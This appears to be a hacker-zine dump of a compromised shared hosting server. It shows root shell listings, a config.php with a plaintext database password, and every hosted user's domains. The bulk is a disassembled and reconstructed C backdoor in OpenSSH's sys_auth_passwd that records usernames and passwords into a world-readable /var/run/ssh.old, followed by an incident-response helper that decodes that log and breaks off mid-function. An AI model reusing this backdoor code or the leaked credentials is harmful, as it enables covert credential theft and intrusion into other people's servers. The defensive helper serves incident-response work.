-rw-r--r-- 1 romeo romeo 8398 Feb 16 08:01 login.php
-rwxr-xr-x 1 romeo romeo 13954 Feb 10 19:31 logo.jpg
-rw-r--r-- 1 romeo romeo 3006 Feb 16 08:01 merge.php
drwxr-xr-x 20 romeo romeo 4096 Feb 17 09:01 modules
-rw-r--r-- 1 romeo romeo 10964 Feb 16 08:01 pastebin.php
-rw-r--r-- 1 romeo romeo 35466 Feb 19 14:39 post.php
-rw-r--r-- 1 romeo romeo 2142 Feb 16 08:01 privatemessages.php
-rw-r--r-- 1 romeo romeo 9755 Feb 21 09:08 register.php
-rw-r--r-- 1 romeo romeo 7986 Feb 16 08:01 rss.php
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 scripts
-rw-r--r-- 1 romeo romeo 1065 Feb 16 08:01 search.php
-rw-r--r-- 1 romeo romeo 1838 Feb 16 08:01 settings.php
drwxr-xr-x 8 romeo romeo 4096 Mar 19 10:13 skin
-rw-r--r-- 1 romeo romeo 196608 Mar 19 10:20 skin.tgz
-rw-r--r-- 1 romeo romeo 636 Feb 16 08:01 staff.php
-rw-r--r-- 1 romeo romeo 133049 May 23 04:00 stress_test.txt
-rw-r--r-- 1 romeo romeo 994 Feb 10 19:31 swiigle_upload.php
drwxr-xr-x 5 romeo romeo 4096 Feb 16 19:13 template
-rw-r--r-- 1 romeo romeo 454 Feb 10 19:31 template.php
-rw-r--r-- 1 romeo romeo 590 Feb 10 19:31 test.php
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 txt docs
-rw-r--r-- 1 romeo romeo 2708 Feb 16 08:01 ucp.php
-rw-r--r-- 1 romeo romeo 8546 Feb 19 14:12 view_group.php
-rw-r--r-- 1 romeo romeo 876 Feb 16 08:01 view_profile.php
-rw-r--r-- 1 romeo romeo 12838 Feb 19 14:12 view_topic.php
-rw-r--r-- 1 romeo romeo 9571 Feb 16 08:01 windowed_options.php
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2 public_html]# cd core
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2 core]# ls -al
total 164
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 .
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 ..
-rw-r--r-- 1 romeo romeo 731 Feb 10 19:31 admin.js
-rw-r--r-- 1 romeo romeo 27175 Feb 16 19:00 base_functions.php
-rw-r--r-- 1 romeo romeo 9266 Feb 16 19:00 bbcode_tags.php
-rw-r--r-- 1 romeo romeo 2816 Feb 10 19:31 cacher.php
drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 classes
-rw-r--r-- 1 romeo romeo 1376 Feb 16 19:00 cli.php
-rw-r--r-- 1 romeo romeo 2847 Feb 10 19:33 config.php
-rw-r--r-- 1 romeo romeo 23727 Feb 17 09:53 core.php
-rw-r--r-- 1 romeo romeo 4518 Feb 10 19:31 cron.php
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 err
-rw-r--r-- 1 romeo romeo 236 Feb 16 19:00 force_user.php
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 functions
-rw-r--r-- 1 romeo romeo 1181 Feb 16 19:00 key.php
-rw-r--r-- 1 romeo romeo 6903 Feb 16 19:00 mailer.php
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 mint
-rw-r--r-- 1 romeo romeo 3054 Feb 16 19:00 page_footer.php
-rw-r--r-- 1 romeo romeo 6429 Feb 16 19:00 page_header.php
-rw-r--r-- 1 romeo romeo 9762 Feb 16 19:00 recaptchalib.php
-rw-r--r-- 1 romeo romeo 6601 Apr 5 12:58 security.php
-rw-r--r-- 1 romeo romeo 2760 Feb 16 19:00 usertracker.php
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2 core]# less config.php
<?php
//Cybershade.Org

//Database Stuff
$config['db']['host'] = 'localhost';
$config['db']['username'] = 'romeo_romeo';
$config['db']['password'] = 'swU55ath';
$config['db']['database'] = 'romeo_DMZ_CS';
$config['db']['prefix'] = 'cs_';
$config['db']['shrfix'] = 'shr_'; //the prefix for the shared tables
$config['db']['ckefix'] = 'CMS_'; //the cookie prefix
$config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this is also a good way to invalidate the autologins on cms update
$config['site']['working_dir'] = '';

//config vars for if we loose the DB
$config['cms']['name'] = 'DarkMindZ';
$config['cms']['version'] = '_DDoS';
$config['cms']['debug'] = "0";
$config['site']['title'] = 'CyberShade CMS';
$config['site']['theme'] = 'cs';
$config['site']['language'] = 'en';
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2 public_html]# less stress_test.txt
/codebase/perl-2.html - 74.6.17.162 - Queries: 26 - SQLTime: 68.93934 - PAGETimer: -0.83011 |
/register.php - 89.149.254.135 - Queries: 5 - SQLTime: 10.82445 - PAGETimer: 0.26816 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.93658 - PAGETimer: 0.10656 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.43613 - PAGETimer: 0.05286 |
/index.php - 89.149.254.135 - Queries: 8 - SQLTime: 30.80612 - PAGETimer: 0.04201 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 12.93695 - PAGETimer: 0.05229 |
/index.php - 89.149.254.135 - Queries: 8 - SQLTime: 14.52338 - PAGETimer: 0.04355 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 14.55832 - PAGETimer: 0.05146 |
/forum/post.php?mode=lock_thread&id=5559 - 74.6.17.162 - Queries: 10 - SQLTime: 30.93873 - PAGETimer: 0.2404 |
/forum/thread5853.html - 66.249.70.100 - Queries: 18 - SQLTime: 41.73033 - PAGETimer: 0.09753 |
/codebase/mailform-asp-num147.html - 65.55.211.89 - Queries: 9 - SQLTime: 13.30677 - PAGETimer: 0.11182 |
/ - 216.80.92.36 - Queries: 8 - SQLTime: 21.05451 - PAGETimer: 0.05534 |
root@server2:~[root@server2 ~]# cd /home
root@server2:/home[root@server2 home]# ls -la
total 152
drwx--x--x 36 root root 4096 May 23 02:33 .
drwx--x--x 25 root root 4096 May 22 09:26 ..
drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 aaa
drwx--x--x 6 admin admin 4096 Jan 12 14:29 admin
drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 beyond
drwx--x--x 4 bloo bloo 4096 May 23 02:04 bloo
drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 bootroot
drwx------ 2 clamav clamav 4096 Apr 1 22:35 clamav
drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 dablitz
drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 dakilla
drwxr-xr-x 2 root root 4096 Dec 3 2007 ftp
drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 furiogamin
drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 h3mod
drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 haiobr
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 hbxmike
drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 hotglow
drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 hrdev
drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 hstrike
drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 kaza
drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 keytraderz
drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 mrgod
drwx--x--x 5 odin odin 4096 May 8 05:01 odin
drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 pagewiz
drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 penguin
drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 pimpinjg
drwx--x--x 5 ristop ristop 4096 May 22 15:33 ristop
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 romeo
drwx--x--x 4 sam sam 4096 May 12 09:26 sam
drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 scraft758
drwx------ 2 546 547 4096 May 23 02:33 test
drwxrwxrwt 2 root root 4096 May 23 03:36 tmp
drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 wheelglow
drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 wtfsmilez
drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 xckx
drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 yourkicks
drwx--x--x 5 zer0 zer0 4096 May 23 01:28 zer0
root@server2:/home/zer0/domains[root@server2 domains]# ls -la /home/*/domains/
|
||
/home/aaa/domains/:
|
||
total 12
|
||
drwx--x--x 3 aaa aaa 4096 Sep 14 2007 .
|
||
drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 ..
|
||
drwx--x--x 8 aaa aaa 4096 Sep 14 2007 aaasoda.com
|
||
|
||
/home/admin/domains/:
|
||
total 20
|
||
drwx--x--x 5 admin admin 4096 Jan 12 14:29 .
|
||
drwx--x--x 6 admin admin 4096 Jan 12 14:29 ..
|
||
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 default
|
||
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 sharedip
|
||
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 suspended
|
||
|
||
/home/beyond/domains/:
|
||
total 12
|
||
drwx--x--x 3 beyond beyond 4096 Sep 12 2007 .
|
||
drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 ..
|
||
drwx--x--x 8 beyond beyond 4096 Feb 6 2008 beyond-comparison.com
|
||
|
||
/home/bloo/domains/:
|
||
total 12
|
||
drwx--x--x 3 bloo bloo 4096 May 23 02:04 .
|
||
drwx--x--x 4 bloo bloo 4096 May 23 02:04 ..
|
||
drwx--x--x 6 bloo bloo 4096 May 23 02:04 bloohacks.com
|
||
|
||
/home/bootroot/domains/:
|
||
total 20
|
||
drwx--x--x 5 bootroot bootroot 4096 May 12 21:27 .
|
||
drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 ..
|
||
drwx--x--x 8 bootroot bootroot 4096 May 9 18:57 bootforfun.com
|
||
drwx--x--x 7 bootroot bootroot 4096 Mar 2 00:11 bootforfun.net
|
||
drwx--x--x 7 bootroot bootroot 4096 May 13 00:10 bootforfun.org
|
||
|
||
/home/dablitz/domains/:
|
||
total 16
|
||
drwx--x--x 4 dablitz dablitz 4096 Jan 3 23:34 .
|
||
drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 ..
|
||
drwx--x--x 8 dablitz dablitz 4096 Jan 17 10:32 blitzcraze.com
|
||
drwx--x--x 8 dablitz dablitz 4096 Jan 24 07:14 blitzdownloads.com
|
||
/home/dakilla/domains/:
|
||
total 12
|
||
drwxr-xr-x 3 dakilla dakilla 4096 May 16 07:49 .
|
||
drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 ..
|
||
drwxr-xr-x 8 dakilla dakilla 4096 Feb 15 00:11 scionbot.com
|
||
|
||
/home/furiogamin/domains/:
|
||
total 20
|
||
drwx--x--x 5 furiogamin furiogamin 4096 Feb 19 06:57 .
|
||
drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 ..
|
||
drwx--x--x 8 furiogamin furiogamin 4096 Feb 18 11:04 furiogaming.com
|
||
drwx--x--x 7 furiogamin furiogamin 4096 Dec 27 21:11 furiogaming.net
|
||
drwx--x--x 5 furiogamin furiogamin 4096 Apr 10 13:14 softmodding.net
|
||
|
||
/home/h3mod/domains/:
|
||
total 12
|
||
drwx--x--x 3 h3mod h3mod 4096 Jan 18 2008 .
|
||
drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 ..
|
||
drwx--x--x 8 h3mod h3mod 4096 Oct 2 2008 h3mod.com
|
||
|
||
/home/haiobr/domains/:
|
||
total 12
|
||
drwxr-xr-x 3 haiobr haiobr 4096 May 1 14:26 .
|
||
drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 ..
|
||
drwxr-xr-x 9 haiobr haiobr 4096 May 1 14:26 super-syn.net
|
||
|
||
/home/hbxmike/domains/:
|
||
total 16
|
||
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 .
|
||
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 ..
|
||
drwx--x--x 7 hbxmike hbxmike 4096 May 12 00:11 hackordie.net
|
||
drwx--x--x 8 hbxmike hbxmike 4096 Apr 29 00:10 wesellstuff.biz
|
||
|
||
/home/hotglow/domains/:
|
||
total 12
|
||
drwxr-xr-x 3 hotglow hotglow 4096 Sep 3 2007 .
|
||
drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 ..
|
||
drwxr-xr-x 8 hotglow hotglow 4096 Sep 3 2007 hotglowneon.com
|
||
|
||
/home/hrdev/domains/:
|
||
total 12
|
||
drwxr-xr-x 3 hrdev hrdev 4096 Dec 2 19:31 .
|
||
drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 ..
|
||
drwxr-xr-x 8 hrdev hrdev 4096 Dec 10 2007 hr-development.net
|
||
|
||
/home/hstrike/domains/:
|
||
total 12
|
||
drwx--x--x 3 hstrike hstrike 4096 Apr 24 2008 .
|
||
drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 ..
|
||
drwx--x--x 8 hstrike hstrike 4096 Oct 31 2008 halostrike.com
|
||
|
||
/home/kaza/domains/:
|
||
total 28
|
||
drwx--x--x 7 kaza kaza 4096 Apr 25 15:46 .
|
||
drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 ..
|
||
drwx--x--x 7 kaza kaza 4096 Jan 6 21:14 crypticgamers.com
|
||
drwx--x--x 7 kaza kaza 4096 Jan 5 21:13 crypticgamers.net
|
||
drwx--x--x 7 kaza kaza 4096 Jan 15 21:12 godlymods.com
|
||
drwx--x--x 7 kaza kaza 4096 May 4 08:50 kindclan.co.cc
|
||
drwx--x--x 7 kaza kaza 4096 Feb 4 00:10 mortonnetworks.com
|
||
|
||
/home/keytraderz/domains/:
|
||
total 20
|
||
drwx--x--x 5 keytraderz keytraderz 4096 Jan 18 21:18 .
|
||
drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 ..
|
||
drwx--x--x 8 keytraderz keytraderz 4096 Jan 5 21:20 1nesolution.com
|
||
drwx--x--x 8 keytraderz keytraderz 4096 Jan 13 21:16 gotmovies.net
|
||
drwx--x--x 8 keytraderz keytraderz 4096 Jan 2 21:15 keytraderz.com
|
||
|
||
/home/mrgod/domains/:
|
||
total 12
|
||
drwx--x--x 3 mrgod mrgod 4096 May 14 19:46 .
|
||
drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 ..
|
||
drwx--x--x 7 mrgod mrgod 4096 May 15 00:11 international-gaming.net
|
||
|
||
/home/odin/domains/:
|
||
total 12
|
||
drwx--x--x 3 odin odin 4096 May 2 04:09 .
|
||
drwx--x--x 5 odin odin 4096 May 8 05:01 ..
|
||
drwx--x--x 7 odin odin 4096 May 15 08:14 evilzone.ws
|
||
|
||
/home/pagewiz/domains/:
|
||
total 12
|
||
drwx--x--x 3 pagewiz pagewiz 4096 May 18 18:08 .
|
||
drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 ..
|
||
drwx--x--x 8 pagewiz pagewiz 4096 May 19 00:10 pagewizzstudio.com
|
||
|
||
/home/penguin/domains/:
|
||
total 12
|
||
drwx--x--x 3 penguin penguin 4096 Dec 20 11:24 .
|
||
drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 ..
|
||
drwx--x--x 7 penguin penguin 4096 Dec 20 21:12 phylumstudios.com
|
||
|
||
/home/pimpinjg/domains/:
|
||
total 16
|
||
drwx--x--x 4 pimpinjg pimpinjg 4096 Mar 26 16:13 .
|
||
drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 ..
|
||
drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 26 16:13 h4ckinab0x.com
|
||
drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 27 00:11 teamhbx.com
|
||
|
||
/home/ristop/domains/:
|
||
total 12
|
||
drwx--x--x 3 ristop ristop 4096 May 22 13:33 .
|
||
drwx--x--x 5 ristop ristop 4096 May 22 15:33 ..
|
||
drwx--x--x 8 ristop ristop 4096 May 23 00:10 centosservers.com
|
||
|
||
/home/romeo/domains/:
|
||
total 16
|
||
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
|
||
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
|
||
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
|
||
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
|
||
|
||
/home/sam/domains/:
|
||
total 12
|
||
drwx--x--x 3 sam sam 4096 May 12 09:00 .
|
||
drwx--x--x 4 sam sam 4096 May 12 09:26 ..
|
||
drwx--x--x 8 sam sam 4096 May 13 00:11 metus-project.com
|
||
|
||
/home/scraft758/domains/:
|
||
total 24
|
||
drwx--x--x 6 scraft758 scraft758 4096 Apr 16 20:03 .
|
||
drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 ..
|
||
drwx--x--x 7 scraft758 scraft758 4096 Jan 27 21:12 mods4hire.com
|
||
drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.com
|
||
drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.net
|
||
drwx--x--x 7 scraft758 scraft758 4096 Oct 28 2008 theconsolejunkies.com
|
||
|
||
/home/wheelglow/domains/:
|
||
total 12
|
||
drwx--x--x 3 wheelglow wheelglow 4096 Sep 12 2007 .
|
||
drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 ..
|
||
drwx--x--x 8 wheelglow wheelglow 4096 Sep 12 2007 wheelglow.com
|
||
|
||
/home/wtfsmilez/domains/:
|
||
total 12
|
||
drwx--x--x 3 wtfsmilez wtfsmilez 4096 Apr 30 17:00 .
|
||
drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 ..
|
||
drwx--x--x 8 wtfsmilez wtfsmilez 4096 May 3 19:12 wtfgamers.net
|
||
|
||
/home/xckx/domains/:
|
||
total 16
|
||
drwx--x--x 4 xckx xckx 4096 Feb 22 02:44 .
|
||
drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 ..
|
||
drwx--x--x 7 xckx xckx 4096 Apr 16 2008 oinfam0uso.com
|
||
drwx--x--x 7 xckx xckx 4096 Feb 23 00:12 snayke.com
|
||
|
||
/home/yourkicks/domains/:
|
||
total 16
|
||
drwx--x--x 4 yourkicks yourkicks 4096 Jan 6 19:33 .
|
||
drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 ..
|
||
drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.com
|
||
drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.net
|
||
|
||
/home/zer0/domains/:
|
||
total 12
|
||
drwx--x--x 3 zer0 zer0 4096 May 20 17:00 .
|
||
drwx--x--x 5 zer0 zer0 4096 May 23 01:28 ..
|
||
drwx--x--x 8 zer0 zer0 4096 May 23 01:28 zer0zone.ws
|
||
|
||
Ghetto.
|
||
|
||
|
||
|
||
|
||
_______ _______ ______
|
||
\ _ \ ___ __\ _ \ / __ \
|
||
/ /_\ \\ \/ / /_\ \ > <
|
||
\ \_/ \> <\ \_/ \/ -- \
|
||
\_____ /__/\_ \\_____ /\______ /
|
||
\/ \/ \/ \/
|
||
__________ __ .___
|
||
\______ \_____ ____ | | __ __| _/____ ___________
|
||
| | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \
|
||
| | \ / __ \\ \___| </ /_/ ( <_> | <_> ) | \/
|
||
|______ /(____ /\___ >__|_ \____ |\____/ \____/|__|
|
||
\/ \/ \/ \/ \/
|
||
___________________ ___________
|
||
\______ \_ ___ \\_ _____/
|
||
| _/ \ \/ | __)_
|
||
| | \ \____| \
|
||
|____|_ /\______ /_______ /
|
||
\/ \/ \/
|
||
|
||
|
||
char abuff[1024];
|
||
char sbuff[1024];
|
||
char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
|
||
char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
|
||
char * aOwned ="see below";
|
||
char * aAGb7 = "a-gb7";
|
||
/*
|
||
.rodata:08078D34 aOwned db 0Ah ; DATA XREF: do_motd+DFo
|
||
.rodata:08078D34 db 9,9,'+----------------------------[ Owned ]-------------------------'
|
||
.rodata:08078D34 db '---+',0Ah
|
||
.rodata:08078D34 db 9,9,'| Hack everyone you can and then hack some more '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'| Owned[DC] v2 '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'| _______ . _______ . _______ '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'| Get in as anonymous, Leave with no trace. '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'| '
|
||
.rodata:08078D34 db ' |',0Ah
|
||
.rodata:08078D34 db 9,9,'+--------------------------------------------------------------'
|
||
.rodata:08078D34 db '---+',0Ah,0
|
||
*/
|
||
char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
|
||
char s[1024];
|
||
char * filename = "/var/run/ssh.old";
|
||
int i = 0; // loop index (ai in the disassembly); a char would overflow on a 1024-byte buffer
|
||
size_t len;
|
||
FILE * log;
|
||
char * HookinSS = "HOOKIN: %s:%s\n"; // aHookinSS in the disassembly below
|
||
char * a0x3aownt = "0x3aownt";
|
||
char * aSk3rhgldyw = "Sk3rhGLdYW";
|
||
|
||
|
||
//known structs
|
||
|
||
struct passwd {
|
||
char *pw_name;
|
||
char *pw_passwd;
|
||
uid_t pw_uid;
|
||
gid_t pw_gid;
|
||
time_t pw_change;
|
||
char *pw_class;
|
||
char *pw_gecos;
|
||
char *pw_dir;
|
||
char *pw_shell;
|
||
time_t pw_expire;
|
||
};
|
||
|
||
|
||
struct Authctxt {
|
||
int success;
|
||
int postponed; /* authentication needs another step */
|
||
int valid; /* user exists and is allowed to login */
|
||
int attempt;
|
||
int failures;
|
||
int force_pwchange;
|
||
char *user; /* username sent by the client */
|
||
char *service;
|
||
struct passwd *pw; /* set if 'valid' */
|
||
char *style;
|
||
void *kbdintctxt;
|
||
#ifdef BSD_AUTH
|
||
auth_session_t *as;
|
||
#endif
|
||
#ifdef KRB5
|
||
krb5_context krb5_ctx;
|
||
krb5_ccache krb5_fwd_ccache;
|
||
krb5_principal krb5_user;
|
||
char *krb5_ticket_file;
|
||
char *krb5_ccname;
|
||
#endif
|
||
Buffer *loginmsg;
|
||
void *methoddata;
|
||
};
|
||
|
||
struct utsname {
|
||
char sysname[_SYS_NMLN];
|
||
char nodename[_SYS_NMLN];
|
||
char release[_SYS_NMLN];
|
||
char version[_SYS_NMLN];
|
||
char machine[_SYS_NMLN];
|
||
};
|
||
|
||
/* sys_auth_passwd
|
||
.text:0804FA98 push edi
|
||
.text:0804FA99 push dword ptr [esi] ; esi = arg_0 + 20h
|
||
.text:0804FA99 ; authctxt->pw
|
||
.text:0804FA99 ; [esi] = pw->pw_name
|
||
.text:0804FA9B push offset aHookinSS ; "HOOKIN: %s:%s\n"
|
||
.text:0804FAA0 push offset abuff ; s
|
||
.text:0804FAA5 call _sprintf
|
||
.text:0804FAAA mov edi, offset abuff ; start: strlen(abuff)
|
||
.text:0804FAAF xor eax, eax
|
||
.text:0804FAB1 cld
|
||
.text:0804FAB2 mov ecx, 0FFFFFFFFh
|
||
.text:0804FAB7 repne scasb
|
||
.text:0804FAB9 not ecx
|
||
.text:0804FABB lea edx, [ecx-1]
|
||
.text:0804FABE add esp, 10h
|
||
.text:0804FAC1 cmp ebx, edx ; fin;
|
||
.text:0804FAC3 mov ds:alen, edx ; alen = strlen result
|
||
.text:0804FAC9 mov ds:ai, 0 ; for(ai = 0
|
||
.text:0804FAD3 jg short loc_804FAE8
|
||
.text:0804FAD5 xor eax, eax
|
||
.text:0804FAD7 nop
|
||
.text:0804FAD8
|
||
.text:0804FAD8 loc_804FAD8: ; CODE XREF: sys_auth_passwd+CDj
|
||
.text:0804FAD8 not ds:abuff[eax]
|
||
.text:0804FADE inc eax ; eax++ (ai++)
|
||
.text:0804FADF cmp eax, edx ; ;ai<=edx (alen)
|
||
.text:0804FAE1 jle short loc_804FAD8
|
||
.text:0804FAE3 mov ds:ai, eax
|
||
.text:0804FAE8
|
||
.text:0804FAE8 loc_804FAE8: ; CODE XREF: sys_auth_passwd+BFj
|
||
.text:0804FAE8 sub esp, 8
|
||
.text:0804FAEB push (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
|
||
.text:0804FAF0 push offset filename ; "/var/run/ssh.old"
|
||
.text:0804FAF5 call _fopen ; fopen(filename,"a")
|
||
.text:0804FAFA add esp, 10h
|
||
.text:0804FAFD test eax, eax ; if(fopen(...) != NULL)
|
||
.text:0804FAFD ; jump
|
||
.text:0804FAFF mov ds:alog, eax
|
||
.text:0804FB04 jnz short loc_804FB3B
|
||
.text:0804FB06
|
||
.text:0804FB06 loc_804FB06: ; CODE XREF: sys_auth_passwd+149j
|
||
.text:0804FB06 sub esp, 8
|
||
.text:0804FB09 push 1B6h ; mode (0666)
|
||
.text:0804FB0E push offset filename ; "/var/run/ssh.old"
|
||
.text:0804FB13 call _chmod ; chmod(filename,0666)
|
||
.text:0804FB18 lea esp, [ebp-0Ch]
|
||
.text:0804FB1B pop ebx
|
||
.text:0804FB1C pop esi
|
||
.text:0804FB1D mov eax, 1
|
||
.text:0804FB22 pop edi
|
||
.text:0804FB23 leave
|
||
.text:0804FB24 retn ; return 1
|
||
.text:0804FB24 ; ---------------------------------------------------------------------------
|
||
.text:0804FB25 align 4
|
||
.text:0804FB28
|
||
.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
|
||
.text:0804FB28 sub esp, 0Ch
|
||
.text:0804FB2B push esi
|
||
.text:0804FB2C call shadow_pw
|
||
.text:0804FB31 mov ebx, eax
|
||
.text:0804FB33 add esp, 10h
|
||
.text:0804FB36 jmp loc_804FA34
|
||
.text:0804FB3B ; ---------------------------------------------------------------------------
|
||
.text:0804FB3B
|
||
.text:0804FB3B loc_804FB3B: ; CODE XREF: sys_auth_passwd+F0j
|
||
.text:0804FB3B push eax ; eax = file stream
|
||
.text:0804FB3C push 1
|
||
.text:0804FB3E push ds:alen ; length of abuff
|
||
.text:0804FB44 push offset abuff ; ptr to abuff
|
||
.text:0804FB49 call _fwrite
|
||
.text:0804FB4E pop eax
|
||
.text:0804FB4F push ds:alog ; stream
|
||
.text:0804FB55 call _fclose ; fclose(alog)
|
||
.text:0804FB5A add esp, 10h
|
||
.text:0804FB5D jmp short loc_804FB06
|
||
.text:0804FB5D sys_auth_passwd endp
|
||
*/
|
||
|
||
|
||
int sys_auth_passwd(Authctxt *authctxt, const char *password)
|
||
{
|
||
struct passwd *pw = authctxt->pw;
|
||
char *encrypted_password;
|
||
|
||
/* Just use the supplied fake password if authctxt is invalid */
|
||
char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
|
||
|
||
/* Check for users with no password. */
|
||
if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
|
||
return (1);
|
||
|
||
/* Encrypt the candidate password using the proper salt. */
|
||
encrypted_password = xcrypt(password,
|
||
(pw_password[0] && pw_password[1]) ? pw_password : "xx");
|
||
|
||
	if (strcmp(encrypted_password, pw_password) != 0) // wrong password: reject without logging
|
||
return (0);
|
||
|
||
sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
|
||
len = strlen(abuff);
|
||
for(i = 0;i<=len;i++)
|
||
abuff[i] = ~abuff[i]; // An unbreakable NOT encryption algorithm!
|
||
if((log = fopen(filename,"a"))!=NULL) {
|
||
		fwrite(abuff,len,1,log);
|
||
fclose(log);
|
||
}
|
||
chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
|
||
return 1;
|
||
/*
|
||
* Authentication is accepted if the encrypted passwords
|
||
* are identical.
|
||
*/
|
||
//return (strcmp(encrypted_password, pw_password) == 0);
|
||
}
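
Added example, not part of the original zine and not code from the backdoor: a C triage helper for incident response that reverses the per-byte NOT applied to /var/run/ssh.old in sys_auth_passwd above and lists which accounts were captured, keeping only each password's length. The sample log is constructed inline; HOOK_PREFIX, struct hook_record, parse_hook_log and demo_parse are names introduced for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOOK_PREFIX "HOOKIN: "   /* record prefix from the format string on the page */

/* One recovered record. The password itself is never stored, only its length. */
struct hook_record {
	char   user[64];
	size_t pass_len;
};

/*
 * Decode n bytes read from the log (each byte was stored as ~byte) and
 * split them into records of the form "HOOKIN: <user>:<password>\n".
 * Returns the number of records stored in recs; non-empty lines that do
 * not match the format are counted in *skipped.
 */
size_t parse_hook_log(const unsigned char *enc, size_t n,
                      struct hook_record *recs, size_t max_recs,
                      size_t *skipped)
{
	const size_t plen = strlen(HOOK_PREFIX);
	size_t count = 0, pos = 0;
	char *txt = malloc(n + 1);

	*skipped = 0;
	if (txt == NULL)
		return 0;
	for (size_t i = 0; i < n; i++)          /* NOT is its own inverse */
		txt[i] = (char)(unsigned char)~enc[i];

	while (pos < n && count < max_recs) {
		const char *line = txt + pos;
		const char *nl = memchr(line, '\n', n - pos);
		/* A final record may lack '\n' if the file was copied mid-write. */
		size_t llen = nl ? (size_t)(nl - line) : n - pos;
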